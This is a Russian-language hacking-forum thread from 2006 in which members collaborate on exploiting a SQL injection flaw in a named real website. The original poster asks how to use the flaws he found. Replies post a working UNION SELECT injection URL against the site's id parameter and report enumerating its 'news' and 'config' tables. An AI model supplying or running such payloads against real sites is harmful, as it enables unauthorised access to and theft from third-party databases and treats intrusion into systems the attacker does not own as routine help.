HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

php-inj & sql-inj на generis.ru
  #1  
Старый 28.01.2006, 00:44
gimlis
Новичок
Регистрация: 25.01.2006
Сообщений: 8
С нами: 10678837

Репутация: 2
По умолчанию php-inj & sql-inj на generis.ru

На этом сайте найдены
http://www.generis.ru/
потенциальная php-inj
http://www.generis.ru/?page=qwe
и потенциальная sql-inj
http://www.generis.ru/?page=press_wholenews&id=qwe
Вот я нашел уязвимости, как ими можно воспользоваться?
 
Ответить с цитированием

  #2  
Старый 28.01.2006, 01:07
Nova
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
С нами: 10958786

Репутация: 1034


По умолчанию

Цитата:
Сообщение от gimlis  
http://www.generis.ru/?page=press_wholenews&id=qwe
Вот я нашел уязвимости, как ими можно воспользоваться?
По моему там только SQL Injections а пхп иньекций там нет то просто ошибака стиля вроде....
 
Ответить с цитированием

  #3  
Старый 28.01.2006, 01:19
Rebz
Флудер
Регистрация: 08.11.2004
Сообщений: 3,395
С нами: 11317286

Репутация: 3876


По умолчанию

SQL-inj красава =))
пхп-инъекции к сожалению там нет... если толкьо локальных html-страничек.. но это ничего не даст..
 
Ответить с цитированием

  #4  
Старый 28.01.2006, 01:26
Nova
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
С нами: 10958786

Репутация: 1034


По умолчанию

Цитата:
Сообщение от Rebz  
SQL-inj красава =))
а чем плоха разнообразие как никак чел хоть ' не пихает как все (и я тоже ' пихаю)
 
Ответить с цитированием

  #5  
Старый 28.01.2006, 09:14
gadjet
Познающий
Регистрация: 17.12.2005
Сообщений: 78
С нами: 10735477

Репутация: 23
По умолчанию

Да, там скуль инъекция
http://www.generis.ru/?page=press_wholenews&id=-1+union+select+1,'blablabla',3,4,5,6/*
Далее подбирай таблицы
 
Ответить с цитированием

  #6  
Старый 28.01.2006, 10:38
D1mOn
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
С нами: 10845026

Репутация: 212
По умолчанию

нашёл таблицу news но толку дамаю мало буит от этой таблицы)))

Последний раз редактировалось D1mOn; 28.01.2006 в 10:40..
 
Ответить с цитированием

  #7  
Старый 28.01.2006, 13:01
gadjet
Познающий
Регистрация: 17.12.2005
Сообщений: 78
С нами: 10735477

Репутация: 23
По умолчанию

Да, действительно, толку мало...
 
Ответить с цитированием

  #8  
Старый 28.01.2006, 18:45
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
С нами: 11393666

Репутация: 47
По умолчанию

еще таблица config
но столбцы не подобрал
 
Ответить с цитированием

  #9  
Старый 29.01.2006, 00:15
gimlis
Новичок
Регистрация: 25.01.2006
Сообщений: 8
С нами: 10678837

Репутация: 2
По умолчанию

Цитата:
Сообщение от gadjet  
Да, там скуль инъекция
http://www.generis.ru/?page=press_wholenews&id=-1+union+select+1,'blablabla',3,4,5,6/*
Далее подбирай таблицы
там можно и без /*, запрос не фильтруется вообще и дальше по запросу ничего нет.
 
Ответить с цитированием

  #10  
Старый 29.01.2006, 02:30
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
С нами: 11393666

Репутация: 47
По умолчанию

Цитата:
там можно и без /*, запрос не фильтруется вообще и дальше по запросу ничего нет.
Разве это что-то меняет?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.